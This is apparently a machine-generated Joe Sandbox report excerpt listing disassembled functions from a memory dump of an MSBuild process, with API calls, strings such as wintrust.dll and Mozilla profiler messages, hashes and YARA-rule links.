                                                                                                                                                                                                                      • Instruction ID: 5dc09f12fe4fb8bec875260bf8e74952283c5b4c1e2395454a60ead9baf0f9ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b099a2d9cc5b15df5b9c84180bbe93ce2b3b16e8dc375ffad38d322e421d384
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EA12770A043199FDB20CF69C5807EEBBF1AF4A318F14886DD8857B745C735A945CBA0
                                                                                                                                                                                                                      Function 6C8D0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D0270
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D02E9
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D02F6
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D033A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID: about:blank
                                                                                                                                                                                                                      • API String ID: 2047719359-258612819
                                                                                                                                                                                                                      • Opcode ID: 8397adcd2aa202fb61f7a33dd9f8e38f302e8114269eb758f578ec6f02971f52
                                                                                                                                                                                                                      • Instruction ID: 581720565fb5fb66e04553480ebcb59b900137ed65156285c22b15f6d7d279bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8397adcd2aa202fb61f7a33dd9f8e38f302e8114269eb758f578ec6f02971f52
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E51AE75A05219CFCB10DF58C580A9AB7F1FF89328F25492DC81AA7B41D731B946CB94
                                                                                                                                                                                                                      Function 6C8CE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CE12F
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C8CE084,00000000), ref: 6C8CE137
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C8CE196
                                                                                                                                                                                                                      • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C8CE1E9
                                                                                                                                                                                                                        • Part of subcall function 6C8C99A0: GetCurrentThreadId.KERNEL32 ref: 6C8C99C1
                                                                                                                                                                                                                        • Part of subcall function 6C8C99A0: AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99CE
                                                                                                                                                                                                                        • Part of subcall function 6C8C99A0: ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99F8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C8CE13F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                                                                                                                                                      • API String ID: 2491745604-3904374701
                                                                                                                                                                                                                      • Opcode ID: 012ea508a33dee7fd960db96e15094acdeebdaff450f41f3fef021d452a332d1
                                                                                                                                                                                                                      • Instruction ID: 1805dadd3704184a5f131c4579ce108fee89420a1de11bbf4c1977dc986ee393
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 012ea508a33dee7fd960db96e15094acdeebdaff450f41f3fef021d452a332d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131D2B17047009BC7209F6C86413AAF7E5AFC624CF148D2EE9995BB41DB70D90AC793
                                                                                                                                                                                                                      Function 6C8BF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C8BF480
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: LoadLibraryW.KERNEL32(shell32,?,6C8FD020), ref: 6C88F122
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C88F132
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 6C8BF555
                                                                                                                                                                                                                        • Part of subcall function 6C8914B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C891248,6C891248,?), ref: 6C8914C9
                                                                                                                                                                                                                        • Part of subcall function 6C8914B0: memcpy.VCRUNTIME140(?,6C891248,00000000,?,6C891248,?), ref: 6C8914EF
                                                                                                                                                                                                                        • Part of subcall function 6C88EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C88EEE3
                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C8BF4FD
                                                                                                                                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C8BF523
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                      • String ID: \oleacc.dll
                                                                                                                                                                                                                      • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                      • Opcode ID: 1aa98614c27b84a5dde40e7b71639516d788247709aff3979324d188f208753d
                                                                                                                                                                                                                      • Instruction ID: 0d7af7eaee450d66e73a9e6359f093e22fa15deac77c2fe11c5bd44d319d3717
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aa98614c27b84a5dde40e7b71639516d788247709aff3979324d188f208753d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED418F346087109FE730DF69CA84A9BB7F4AF95318F504E2CF59193750EB30D9898B92
                                                                                                                                                                                                                      Function 6C8CE020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CE047
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CE04F
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8CE09C
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8CE0B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_get_profile, xrefs: 6C8CE057
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_get_profile
                                                                                                                                                                                                                      • API String ID: 1832963901-4276087706
                                                                                                                                                                                                                      • Opcode ID: b75051cbb390aeaabac35b5105737f6b22c73025bcb85a2620f4e91ad9a7ba45
                                                                                                                                                                                                                      • Instruction ID: 334cb142114609fd58c888467925e8b8cd39f05f1b636cd7cf5b4d44cf0f3cd9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b75051cbb390aeaabac35b5105737f6b22c73025bcb85a2620f4e91ad9a7ba45
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA21B074B001088FDF10DF68D959AAEB7B5BF85208F244828ED0AA7740DB31E909C7E2
                                                                                                                                                                                                                      Function 6C8E74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6C8E7526
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E7566
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E7597
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                      • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                      • Opcode ID: 0a5b0be0674a6e02c01fdf1fd91d40d2adffb092519a7eeb514fc9efca14c0d6
                                                                                                                                                                                                                      • Instruction ID: 36f459d8c1b5bacf32d265febb08eeb63a39ea69e56ed3c9fffde36c619eecff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5b0be0674a6e02c01fdf1fd91d40d2adffb092519a7eeb514fc9efca14c0d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721F531705501ABDF34CBA98A15E9A3375EB8BB6EB20092DE80557F41C731AA06C69B
                                                                                                                                                                                                                      Function 6C8EA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F770,-00000001,?,6C8FE330,?,6C8ABDF7), ref: 6C8EA7AF
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C8ABDF7), ref: 6C8EA7C2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000018,?,6C8ABDF7), ref: 6C8EA7E4
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F770), ref: 6C8EA80A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                                                                      • String ID: accelerator.dll
                                                                                                                                                                                                                      • API String ID: 2442272132-2426294810
                                                                                                                                                                                                                      • Opcode ID: 64d96665bd3e0fce44ae7b0681162abf02c642f34831943fd8739239443ce011
                                                                                                                                                                                                                      • Instruction ID: 610678c9009756b41a06335b17fbdd0bd0cd1a83b3e117da99a1bdee3d2593d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64d96665bd3e0fce44ae7b0681162abf02c642f34831943fd8739239443ce011
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D018FB07043049F9B14CF5AD9C4C627BF8FB8BB59714846EE849CB702DB719900CBA1
                                                                                                                                                                                                                      Function 6C88F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ole32,?,6C88EE51,?), ref: 6C88F0B2
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C88F0C2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C88F0DC
                                                                                                                                                                                                                      • Could not find CoTaskMemFree, xrefs: 6C88F0E3
                                                                                                                                                                                                                      • ole32, xrefs: 6C88F0AD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                      • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                                                                                      • API String ID: 2574300362-1578401391
                                                                                                                                                                                                                      • Opcode ID: 710d692ac3c088dc513aadf4fe0ac0f5ac37294897918d47eb018c16014daf27
                                                                                                                                                                                                                      • Instruction ID: 1517b3d3b03a55a2bec78cda3112211061cb0e9e1fd52fcf820870102b78ec3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 710d692ac3c088dc513aadf4fe0ac0f5ac37294897918d47eb018c16014daf27
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFE0267134E3059FEF246A7A9909A2737B9ABA324D3308A2DF402C1F01EF30D410CA66
                                                                                                                                                                                                                      Function 6C8C0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897204), ref: 6C8C0088
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C8C00A7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897204), ref: 6C8C00BE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-3385133079
                                                                                                                                                                                                                      • Opcode ID: c4e0cb3a5332b3b68d7980b80cdd42c98faf73511d032191651c6b1c2cd5c38e
                                                                                                                                                                                                                      • Instruction ID: caef8aa67c92e347ebb56db9d5b62a13266d96f7a3ce513c0545705c849c8dae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4e0cb3a5332b3b68d7980b80cdd42c98faf73511d032191651c6b1c2cd5c38e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE092B47483059BEF10AF6699087827AFCB70B389F3144AEAD16C2650DBB4D184DF5A
                                                                                                                                                                                                                      Function 6C8C00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897235), ref: 6C8C00D8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C8C00F7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897235), ref: 6C8C010E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C8C00F1
                                                                                                                                                                                                                      • wintrust.dll, xrefs: 6C8C00D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-2559046807
                                                                                                                                                                                                                      • Opcode ID: 127b54d00fb5911d11e90e7b29197fe32957f6b67c87ff8edb6b71a7af2560c8
                                                                                                                                                                                                                      • Instruction ID: 58fd402617a59a9172e3254cef9c49e420c45e83e48ab37242be27880697e001
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 127b54d00fb5911d11e90e7b29197fe32957f6b67c87ff8edb6b71a7af2560c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CE012B030D3059BEF009F259A097A2BAFDF70328CF3844AEAE0A81A40DBB0C100CA55
                                                                                                                                                                                                                      Function 6C8C01C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897266), ref: 6C8C01C8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C8C01E7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897266), ref: 6C8C01FE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1489773717
                                                                                                                                                                                                                      • Opcode ID: 75dffe39f09ac892c1b251879bc7570906f226ff7d7c9915ffe8bf7cf4f1e5e5
                                                                                                                                                                                                                      • Instruction ID: 35c703dffc8744337d262cbd1a9659b79359e9aec01d5d0c5a5f854ea851ebf9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75dffe39f09ac892c1b251879bc7570906f226ff7d7c9915ffe8bf7cf4f1e5e5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04E075B47883859BEB106B6689087427AF8BB07389F30485EAD16C1B40DBB0C100DB55
                                                                                                                                                                                                                      Function 6C8C0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(wintrust.dll,?,6C897297), ref: 6C8C0128
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C8C0147
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C897297), ref: 6C8C015E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                                                                                                                                                      • API String ID: 145871493-1536241729
                                                                                                                                                                                                                      • Opcode ID: 8aa2029eb177eb7ea3f009b52d30d320077198cb557459623e98b38d796eeee3
                                                                                                                                                                                                                      • Instruction ID: 06662faca25376d10d96e422e24bcf4a1ee6b60b0285064cbb178b0b9e5f1574
